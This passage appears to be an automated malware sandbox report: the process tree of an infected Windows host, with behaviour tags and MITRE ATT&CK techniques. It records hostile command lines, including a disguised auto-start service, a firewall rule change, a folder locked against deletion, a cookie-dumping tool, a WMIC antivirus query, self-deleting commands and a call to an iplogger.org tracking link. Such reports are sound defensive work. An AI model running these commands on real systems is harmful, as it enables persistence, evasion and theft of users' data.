-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2310⤵PID:7984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u42wp1cn3dx\yejvxlzz0mc.exe"C:\Users\Admin\AppData\Local\Temp\u42wp1cn3dx\yejvxlzz0mc.exe" testparams8⤵
- Executes dropped EXE
PID:672 -
C:\Users\Admin\AppData\Roaming\wezgdqscx1w\lytepznepdt.exe"C:\Users\Admin\AppData\Roaming\wezgdqscx1w\lytepznepdt.exe" /VERYSILENT /p=testparams9⤵PID:3100
-
C:\Users\Admin\AppData\Local\Temp\is-AQUHG.tmp\lytepznepdt.tmp"C:\Users\Admin\AppData\Local\Temp\is-AQUHG.tmp\lytepznepdt.tmp" /SL5="$70240,1611272,61440,C:\Users\Admin\AppData\Roaming\wezgdqscx1w\lytepznepdt.exe" /VERYSILENT /p=testparams10⤵PID:5692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ydr4jlyjful\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ydr4jlyjful\safebits.exe" /S /pubid=1 /subid=4518⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6329⤵
- Program crash
PID:5788
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2128 -
C:\Users\Admin\AppData\Roaming\BAE9.tmp.exe"C:\Users\Admin\AppData\Roaming\BAE9.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1416 -
C:\Users\Admin\AppData\Roaming\BAE9.tmp.exe"C:\Users\Admin\AppData\Roaming\BAE9.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:4444
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:3080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1612
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:1016 -
C:\ProgramData\1604051.17"C:\ProgramData\1604051.17"5⤵
- Executes dropped EXE
PID:2112 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:5972
-
-
-
C:\ProgramData\1947376.21"C:\ProgramData\1947376.21"5⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵PID:2804
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:5504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4036
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5708
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E0B49A1720B2B39C9E2E307FCC884A7A C2⤵
- Loads dropped DLL
PID:3964
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:6196
-
-
C:\Users\Admin\AppData\Local\Temp\is-T9NG6.tmp\setup_10.2_us3.tmp"C:\Users\Admin\AppData\Local\Temp\is-T9NG6.tmp\setup_10.2_us3.tmp" /SL5="$50052,746887,121344,C:\Users\Admin\AppData\Local\Temp\wliya2d0vjn\setup_10.2_us3.exe" /silent1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:772 -
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s12⤵PID:1396
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"3⤵PID:2472
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1Gusg7"2⤵PID:3108
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5308
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6184
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6248
-
C:\Users\Admin\AppData\Local\Temp\F35A.exeC:\Users\Admin\AppData\Local\Temp\F35A.exe1⤵PID:6472
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a885a01a-93e1-48ea-bdf0-8d7eaae0b1e5" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\F35A.exe"C:\Users\Admin\AppData\Local\Temp\F35A.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:4944
-
C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin1.exe"C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin1.exe"3⤵PID:7024
-
-
C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin2.exe"C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin2.exe"3⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin.exe"C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin.exe"3⤵PID:6072
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\updatewin.exe4⤵PID:6832
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:5736
-
-
-
-
C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\5.exe"C:\Users\Admin\AppData\Local\76527509-2925-4444-95b4-3870d56c7b89\5.exe"3⤵PID:3672
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 8524⤵
- Program crash
PID:6492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 9084⤵
- Program crash
PID:6652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 9524⤵
- Program crash
PID:1408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 10724⤵
- Program crash
PID:6948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 10844⤵
- Program crash
PID:4040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 11364⤵
- Program crash
PID:6660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 14164⤵
- Program crash
PID:4640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 14564⤵
- Program crash
PID:7516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 14764⤵
- Program crash
PID:8004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 15964⤵
- Program crash
PID:7272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 16684⤵
- Program crash
PID:228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9E0.exeC:\Users\Admin\AppData\Local\Temp\9E0.exe1⤵PID:6932
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo dbvicTgbw2⤵PID:3912
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx2⤵PID:4648
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Local\Temp\17EB.exeC:\Users\Admin\AppData\Local\Temp\17EB.exe1⤵PID:5124
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\17EB.exe"2⤵PID:4520
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:6596
-
-
-
C:\Users\Admin\AppData\Local\Temp\221D.exeC:\Users\Admin\AppData\Local\Temp\221D.exe1⤵PID:6356
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\02e0ae51512542448d5e840094dd9c75 /t 6256 /p 61841⤵PID:6692
-
C:\Users\Admin\AppData\Local\Temp\2AD9.exeC:\Users\Admin\AppData\Local\Temp\2AD9.exe1⤵PID:6820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uiudxlkt\2⤵PID:6388
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vhgufpxr.exe" C:\Windows\SysWOW64\uiudxlkt\2⤵PID:5992
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create uiudxlkt binPath= "C:\Windows\SysWOW64\uiudxlkt\vhgufpxr.exe /d\"C:\Users\Admin\AppData\Local\Temp\2AD9.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3676
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description uiudxlkt "wifi internet conection"2⤵PID:5512
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start uiudxlkt2⤵PID:2808
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:5748
-
-
C:\Users\Admin\AppData\Local\Temp\3D1A.exeC:\Users\Admin\AppData\Local\Temp\3D1A.exe1⤵PID:5484
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\4C4D.exeC:\Users\Admin\AppData\Local\Temp\4C4D.exe1⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\4C4D.exeC:\Users\Admin\AppData\Local\Temp\4C4D.exe2⤵PID:6280
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6008
-
C:\Windows\SysWOW64\uiudxlkt\vhgufpxr.exeC:\Windows\SysWOW64\uiudxlkt\vhgufpxr.exe /d"C:\Users\Admin\AppData\Local\Temp\2AD9.exe"1⤵PID:5676
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\5FB7.exeC:\Users\Admin\AppData\Local\Temp\5FB7.exe1⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:4116
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:6760
-
-
C:\Users\Admin\AppData\Local\Temp\6D45.exeC:\Users\Admin\AppData\Local\Temp\6D45.exe1⤵PID:4100
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6396
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{656042f8-fe92-6842-a4c3-d367f28b376b}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:5548
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000190"2⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\85BF.exeC:\Users\Admin\AppData\Local\Temp\85BF.exe1⤵PID:6728
-
C:\Users\Admin\AppData\Local\Temp\85BF.exe"C:\Users\Admin\AppData\Local\Temp\85BF.exe"2⤵PID:5388
-
-
C:\Users\Admin\AppData\Local\Temp\9774.exeC:\Users\Admin\AppData\Local\Temp\9774.exe1⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\is-Q2RRD.tmp\9774.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q2RRD.tmp\9774.tmp" /SL5="$403B6,300262,216576,C:\Users\Admin\AppData\Local\Temp\9774.exe"2⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\is-R44BT.tmp\ST.exe"C:\Users\Admin\AppData\Local\Temp\is-R44BT.tmp\ST.exe" /S /UID=lab2123⤵PID:6580
-
C:\Program Files\Windows Multimedia Platform\HEMOLJLSKJ\prolab.exe"C:\Program Files\Windows Multimedia Platform\HEMOLJLSKJ\prolab.exe" /VERYSILENT4⤵PID:7060
-
C:\Users\Admin\AppData\Local\Temp\is-GD5ER.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-GD5ER.tmp\prolab.tmp" /SL5="$60504,575243,216576,C:\Program Files\Windows Multimedia Platform\HEMOLJLSKJ\prolab.exe" /VERYSILENT5⤵PID:7144
-
-
-
C:\Users\Admin\AppData\Local\Temp\42-a09df-3a3-4e695-7b1a021f20ef6\Tygylepecae.exe"C:\Users\Admin\AppData\Local\Temp\42-a09df-3a3-4e695-7b1a021f20ef6\Tygylepecae.exe"4⤵PID:6336
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rhckio2z.aze\joggaplayer.exe & exit5⤵PID:5956
-
C:\Users\Admin\AppData\Local\Temp\rhckio2z.aze\joggaplayer.exeC:\Users\Admin\AppData\Local\Temp\rhckio2z.aze\joggaplayer.exe6⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qsakijt4.vl5\proxybot.exe & exit5⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\qsakijt4.vl5\proxybot.exeC:\Users\Admin\AppData\Local\Temp\qsakijt4.vl5\proxybot.exe6⤵PID:8056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i02okpx2.2xd\ra4vpn.exe & exit5⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\i02okpx2.2xd\ra4vpn.exeC:\Users\Admin\AppData\Local\Temp\i02okpx2.2xd\ra4vpn.exe6⤵PID:3344
-
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\B5CA.exeC:\Users\Admin\AppData\Local\Temp\B5CA.exe1⤵PID:6380
-
C:\Users\Admin\AppData\Local\Temp\DEFE.tmp.exeC:\Users\Admin\AppData\Local\Temp\DEFE.tmp.exe1⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\E5C5.tmp.exeC:\Users\Admin\AppData\Local\Temp\E5C5.tmp.exe1⤵PID:3340
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\FE6F.tmp.exeC:\Users\Admin\AppData\Local\Temp\FE6F.tmp.exe1⤵PID:716
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7016
-
C:\Users\Admin\AppData\Local\Temp\13FC.tmp.exeC:\Users\Admin\AppData\Local\Temp\13FC.tmp.exe1⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\42BD.tmp.exeC:\Users\Admin\AppData\Local\Temp\42BD.tmp.exe1⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\4DDA.tmp.exeC:\Users\Admin\AppData\Local\Temp\4DDA.tmp.exe1⤵PID:4748
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵PID:7832
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\6069.tmp.exeC:\Users\Admin\AppData\Local\Temp\6069.tmp.exe1⤵PID:6676
-
C:\Users\Admin\AppData\Local\Temp\6BB5.tmp.exeC:\Users\Admin\AppData\Local\Temp\6BB5.tmp.exe1⤵PID:6140
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5960
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6912
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2848
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5900
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7244
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7292
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7352
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7504
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7452
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\BD60.exeC:\Users\Admin\AppData\Local\Temp\BD60.exe1⤵PID:8108
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:7800
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -s BITS1⤵PID:3092
-
C:\Users\Admin\AppData\Local\Temp\F88.exeC:\Users\Admin\AppData\Local\Temp\F88.exe1⤵PID:8032
-
C:\Users\Admin\AppData\Roaming\jueiehiC:\Users\Admin\AppData\Roaming\jueiehi1⤵PID:7916
-
C:\Users\Admin\AppData\Roaming\iveiehiC:\Users\Admin\AppData\Roaming\iveiehi1⤵PID:7648
-
C:\Users\Admin\AppData\Roaming\tweiehiC:\Users\Admin\AppData\Roaming\tweiehi1⤵PID:7312
-
C:\Users\Admin\AppData\Local\a885a01a-93e1-48ea-bdf0-8d7eaae0b1e5\F35A.exeC:\Users\Admin\AppData\Local\a885a01a-93e1-48ea-bdf0-8d7eaae0b1e5\F35A.exe --Task1⤵PID:6284
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
2Scripting
1Web Service
1